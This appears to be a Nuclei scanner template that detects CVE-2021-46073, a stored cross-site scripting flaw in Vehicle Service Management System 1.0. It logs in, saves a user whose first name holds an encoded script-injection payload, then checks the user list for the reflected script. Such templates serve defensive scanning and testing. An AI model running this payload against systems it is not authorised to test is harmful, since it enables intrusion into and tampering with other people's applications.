nuclei-templates/http/cves/2021/CVE-2021-46073.yaml

63 lines
2.6 KiB
YAML

id: CVE-2021-46073
info:
name: Vehicle Service Management System 1.0 - Cross Site Scripting
author: TenBird
severity: medium
description: |
Vehicle Service Management System 1.0 contains a cross-site scripting vulnerability via the User List section in login panel.
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected application.
remediation: |
Upgrade to the latest version to mitigate this vulnerability.
reference:
- https://github.com/plsanu/Vehicle-Service-Management-System-User-List-Stored-Cross-Site-Scripting-XSS
- https://www.plsanu.com/vehicle-service-management-system-user-list-stored-cross-site-scripting-xss
- https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-46073
- https://github.com/SYRTI/POC_to_review
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
cvss-score: 4.8
cve-id: CVE-2021-46073
cwe-id: CWE-79
epss-score: 0.00084
epss-percentile: 0.34354
cpe: cpe:2.3:a:vehicle_service_management_system_project:vehicle_service_management_system:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
vendor: vehicle_service_management_system_project
product: vehicle_service_management_system
tags: cve2021,cve,xss,vms,authenticated,vehicle_service_management_system_project
http:
- raw:
- |
POST /vehicle_service/classes/Login.php?f=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
username={{username}}&password={{password}}
- |
POST /vehicle_service/classes/Users.php?f=save HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
firstname=test1%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&lastname=test&username=test&password=test&type=1
- |
GET /vehicle_service/admin/?page=user/list HTTP/1.1
Host: {{Hostname}}
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: dsl
dsl:
- "contains(header_3, 'text/html')"
- "status_code_3 == 200"
- 'contains(body_3, "<script>alert(document.domain)</script> Test</td>")'
condition: and
# digest: 4a0a004730450220757267cd8631c395b818e7a758bef11697b09c2dbfecd910ceff8f7bfdbb6dd3022100bb35d3060642b78da6284c56746a4e317f459abd72f73212538e28c64ae56ca8:922c64590222798bb761d5b6d8e72950